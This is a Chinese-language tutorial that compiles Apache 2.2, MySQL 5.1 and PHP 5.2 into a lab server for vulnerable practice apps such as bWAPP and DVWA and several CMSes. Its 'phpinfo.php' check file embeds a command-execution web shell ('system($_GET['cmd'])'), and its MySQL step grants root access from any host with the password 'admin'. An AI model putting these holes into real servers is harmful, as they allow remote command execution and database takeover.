一、首先,部署apache
0x01 还是接着我们之前准备好的系统继续,首先,将所有准备安装的源码包上传至服务器,软件包列表如下:
1 2 3 4 5 6 7 8
| httpd-2.2.34.tar.gz libiconv-1.14.tar.gz libmcrypt-2.5.8.tar.gz mcrypt-2.6.8.tar.gz mhash-0.9.9.9.tar.gz mysql-5.1.68.tar.gz php-5.2.17.tar.gz cronolog-1.6.2.tar.gz
|
本次要完成的大致架构如下:
1
| httpd 2.2.34 + mysql 5.1.68 + centOS 6.8_x64 + php 5.2.17
|
0x02 开始编译安装httpd 2.2.34,不过在此之前,你还需要把相应的依赖库先装好,具体过程如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| # yum install zlib zlib-devel gcc-c++ -y # tar xf httpd-2.2.34.tar.gz && cd httpd-2.2.34 # ./configure --prefix=/usr/local/httpd-2.2.34 \ --enable-deflate \ --enable-expires \ --enable-headers \ --enable-modules=most \ --enable-so \ --with-mpm=worker \ --enable-rewrite # make && make install # echo $?
|
0x03 去除apache版本号,方便后续写脚本自动化管理,启动httpd,并将其加入系统自启动
1 2 3 4 5 6 7 8 9 10
| # ln -s /usr/local/httpd-2.2.34/ /usr/local/httpd # cd /usr/local/httpd && ll # /usr/local/httpd/bin/apachectl -l # vi /usr/local/httpd/conf/httpd.conf ServerName localhost:80 # /usr/local/httpd/bin/apachectl start # echo "/usr/local/httpd/bin/apachectl start" >> /etc/rc.local # cd /usr/local/httpd/conf/ && cp httpd.conf httpd.conf.bak && egrep -v "^$|#" httpd.conf.bak > httpd.conf # /usr/local/httpd/bin/apachectl -t # /usr/local/httpd/bin/apachectl graceful
|
0x04 关于 apachectl工具使用说明
1 2 3
| # /usr/local/httpd/bin/apachectl -h # /usr/local/httpd/bin/apachectl -l # /usr/local/httpd/bin/apachectl -M
|
0x05 编辑apache主配置文件 httpd.conf,开启扩展配置,定义web目录,httpd.conf详细配置如下:
1 2
| # useradd tmp -s /sbin/nologin -M # mkdir /var/html/{bwapp,wp,discuz,drupal,joomla,phpcms,phpbb,dvwa} -p
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76
| ServerRoot "/usr/local/httpd-2.2.34" Listen 80 <IfModule !mpm_netware_module> <IfModule !mpm_winnt_module> User tmp Group tmp </IfModule> </IfModule> ServerAdmin seclamp@sec.com ServerName localhost:80 DocumentRoot "/usr/local/httpd-2.2.34/htdocs" <Directory /> Options FollowSymLinks AllowOverride None Order deny,allow Deny from all </Directory> <Directory "/usr/local/httpd-2.2.34/htdocs"> Options Indexes FollowSymLinks AllowOverride None Order allow,deny Allow from all </Directory> <IfModule dir_module> DirectoryIndex index.html </IfModule> <FilesMatch "^\.ht"> Order allow,deny Deny from all Satisfy All </FilesMatch> ErrorLog "logs/error_log" LogLevel warn <IfModule log_config_module> LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common <IfModule logio_module> LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio </IfModule> CustomLog "logs/access_log" common </IfModule> <IfModule alias_module> ScriptAlias /cgi-bin/ "/usr/local/httpd-2.2.34/cgi-bin/" </IfModule> <IfModule cgid_module> </IfModule> <Directory "/usr/local/httpd-2.2.34/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> DefaultType text/plain <IfModule headers_module> RequestHeader unset Proxy early </IfModule> <IfModule mime_module> TypesConfig conf/mime.types AddType application/x-compress .Z AddType application/x-gzip .gz .tgz </IfModule> <IfModule ssl_module> SSLRandomSeed startup builtin SSLRandomSeed connect builtin </IfModule> Include conf/extra/httpd-vhosts.conf Include conf/extra/httpd-mpm.conf Include conf/extra/httpd-default.conf <Directory "/var/html"> Options FollowSymLinks AllowOverride None Order allow,deny Allow from all </Directory>
|
0x06 编辑httpd-vhosts.conf扩展配置文件,添加基于域名的虚拟主机
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67
| NameVirtualHost *:80 <VirtualHost *:80> ServerAdmin bwapp@bwapp.com DocumentRoot "/var/html/bwapp" ServerName www.bwapp.com ServerAlias www.bwapp.com ErrorLog "logs/bwapp-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/bwapp-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin wp@wp.com DocumentRoot "/var/html/wp" ServerName wp.com ServerAlias www.wp.com ErrorLog "logs/wp-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/wp-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin discuz@discuz.com DocumentRoot "/var/html/discuz" ServerName discuz.com ServerAlias www.discuz.com ErrorLog "logs/discuz-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/discuz-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin drupal@durpal.com DocumentRoot "/var/html/drupal" ServerName drupal.com ServerAlias www.drupal.com ErrorLog "logs/drupal-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/drupal-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin joomla@joomla.com DocumentRoot "/var/html/joomla" ServerName joomla.com ServerAlias www.joomla.com ErrorLog "logs/joomla-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/joomla-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin phpcms@phpcms.com DocumentRoot "/var/html/phpcms" ServerName phpcms.com ServerAlias www.phpcms.com ErrorLog "logs/phpcms-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpcms-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin phpbb@phpbb.com DocumentRoot "/var/html/phpbb" ServerName phpbb.com ServerAlias www.phpbb.com ErrorLog "logs/phppp-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined </VirtualHost> <VirtualHost *:80> ServerAdmin dvwa@bwapp.com DocumentRoot "/var/html/dvwa" ServerName dvwa.com ServerAlias www.dvwa.com ErrorLog "logs/dvwa-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/dvwa-access_%Y%m%d.log" combined </VirtualHost>
|
0x07 利用cronlog工具来实现日志自动轮询,只需要到各个虚拟主机中去调整为如下的格式即可
1 2 3 4
| # tar xf cronolog-1.6.2.tar.gz # cd cronolog-1.6.2 # ./configure && make && make install # echo $?
|
1 2 3 4 5 6 7 8 9
| # vi /usr/local/httpd/conf/extra/httpd-vhosts.conf <VirtualHost *:80> ServerAdmin phpbb@phpbb.com DocumentRoot "/var/html/phpbb" ServerName phpbb.com ServerAlias www.phpbb.com ErrorLog "logs/phppp-error_log" CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined </VirtualHost>
|
0x08 初步优化apache
调节apache默认并发
1 2 3 4 5 6 7 8 9
| # vi /usr/local/httpd/conf/extra/httpd-mpm.conf <IfModule mpm_worker_module> StartServers 2 MaxClients 300 MinSpareThreads 45 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule>
|
配置文件级别隐藏apache版本号
1 2 3 4 5 6 7 8 9 10 11
| Timeout 300 KeepAlive On MaxKeepAliveRequests 100 KeepAliveTimeout 5 UseCanonicalName Off AccessFileName .htaccess ServerTokens Prod ServerSignature Off HostnameLookups Off
|
1 2
| # /usr/local/httpd/bin/apachectl -t # /usr/local/httpd/bin/apachectl graceful
|
二、部署mysql
创建mysql服务用户
1 2
| # groupadd mysql # useradd mysql -s /sbin/nologin -M -g mysql
|
编译安装mysql-5.1.68,详细编译参数如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| # yum install ncurses-devel openssl openssl-devel -y # tar xf mysql-5.1.68.tar.gz # cd mysql-5.1.68 # ./configure \ --prefix=/usr/local/mysql-5.1.68 \ --with-unix-socket-path=/usr/local/mysql-5.1.68/tmp/mysql.sock \ --localstatedir=/usr/local/mysql-5.1.68/data \ --enable-assembler \ --enable-thread-safe-client \ --enable-static \ --with-mysqld-user=mysql \ --with-big-tables \ --without-debug \ --with-pthread \ --with-charset=utf8 \ --with-extra-charsets=all \ --with-readline \ --with-ssl \ --with-embedded-server \ --enable-local-infile \ --with-plugins=max \ --with-plugins=partition,innobase \ --with-mysqld-ldflags=-all-static \ --with-client-ldflags=-all-static # make && make install # echo $? # ln -s /usr/local/mysql-5.1.68/ /usr/local/mysql
|
快速初始化mysql
1 2 3 4 5 6 7 8 9 10 11
| # cp support-files/my-small.cnf /etc/my.cnf # mkdir /usr/local/mysql/data # chown -R mysql.mysql /usr/local/mysql # /usr/local/mysql/bin/mysql_install_db --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql # chown -R root.root /usr/local/mysql/ # chown -R mysql.mysql /usr/local/mysql/{tmp,data} # /usr/local/mysql/bin/mysqld_safe & # echo "/usr/local/mysql/bin/mysqld_safe &" >> /etc/rc.local # lsof -i :3306 # cp /usr/local/mysql/bin/* /usr/local/sbin/ # mysqladmin -uroot password "admin"
|
1 2 3 4 5 6 7
| # mysql -uroot -p mysql> drop database test; mysql> select user,host from mysql.user; mysql> drop user ''@'localhost'; mysql> drop user ''@'seclamp'; mysql> drop user 'root'@'seclamp'; mysql> grant all on *.* to 'root'@'%' identified by 'admin' with grant option;flush privileges;
|
三、部署php
安装好所需的各种依赖库
1 2 3 4 5 6 7 8 9 10 11
| # yum install -y zlib zlib-devel libxml2-devel libjpeg # yum install -y libjpeg-devel libpng libpng-devel libxslt-devel # yum install -y freetype freetype-devel gd gd-devel curl curl-devel # yum install epel-release -y # yum install libmcrypt libmcrypt-devel mcrypt mhash mhash-devel openssl openssl-devel bzip2-devel -y # wget https://ftp.gnu.org/gnu/libiconv/libiconv-1.14.tar.gz # tar xf libiconv-1.14.tar.gz # cd libiconv-1.14 && ./configure --prefix=/usr/local/libiconv && make && make install # ln -s /usr/lib64/libjpeg.so /usr/lib/libjpeg.so # ln -s /usr/lib64/libpng.so /usr/lib/libpng.so # yum install libtool libtool-ltdl-devel -y
|
编译安装 php 5.2.17,复制的时候,务必注意下空格
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
| # tar xf php-5.2.17.tar.gz # cd php-5.2.17 # ./configure \ --prefix=/usr/local/php-5.2.17 \ --with-apxs2=/usr/local/httpd/bin/apxs \ --with-mysql=/usr/local/mysql \ --with-pdo-mysql=/usr/local/mysql \ --with-config-file-path=/etc \ --with-config-file-scan-dir=/etc/php.d \ --with-xmlrpc \ --with-openssl \ --with-zlib \ --with-bz2 \ --with-gettext \ --with-mhash \ --with-mcrypt \ --with-libxml-dir \ --with-iconv=/usr/local/libiconv \ --with-curl \ --with-gd \ --with-jpeg-dir \ --with-png-dir \ --with-freetype-dir \ --enable-gd-native-ttf \ --enable-bcmath \ --enable-mbstring \ --enable-zip \ --enable-soap \ --enable-sockets \ --enable-ftp \ --enable-static \ --enable-zend-multibyte \ --without-pear # echo "#LoadModule php5_module /usr/local/httpd-2.2.34/modules/libphp5.so" >> httpd.conf # make && make install # ln -s /usr/local/php-5.2.17/ /usr/local/php # ll /usr/local/httpd/modules/ # grep "libphp5" /usr/local/httpd/conf/httpd.conf # cp php.ini-dist /etc/php.ini
|
安装各种php扩展库
1 2 3 4 5 6 7 8 9 10 11 12
| # yum install autoconf -y # cd ext/mysqli/ # /usr/local/php/bin/phpize # ./configure --prefix=/usr/local/mysqli \ --with-php-config=/usr/local/php/bin/php-config \ --with-mysqli=/usr/local/mysql/bin/mysql_config
# make && make install # ls /usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/ # vi /etc/php.ini extension_dir = "/usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/" extension=mysqli.so
|
1 2 3 4 5 6 7 8 9 10 11
| <IfModule dir_module> DirectoryIndex index.php index.html </IfModule> <IfModule mime_module> TypesConfig conf/mime.types AddType application/x-compress .Z AddType application/x-gzip .gz .tgz AddType application/x-httpd-php .php </IfModule>
|
回过头来好好检查刚刚编译的扩展是不是确实都装上了,看看web服务用户权限是不是自己设定好的那个
1 2 3 4 5 6 7
| # vi /var/html/bwapp/phpinfo.php <?php echo "<pre>"; @system($_GET['cmd']); echo "</pre>"; phpinfo(); ?>
|
四、安装各类开源程序对环境进行全面可用性检测
1 2 3 4 5 6 7
| 安装bwapp 漏洞演练程序 安装dvwa 漏洞演练程序 安装 Discuz X3.2 安装drupal 7.56 安装 wordpress 4.8.1 安装 joomla 3.6.5 ...
|
End
写脚本,写脚本,写脚本,重要的事情说三遍,或者更暴力一点,配好了以后直接打rpm包,另外,此环境仅作为自己学习之用,所以基本没做过任何加固处理,严禁直接参考用于实际生产环境中,否则,一切后果自负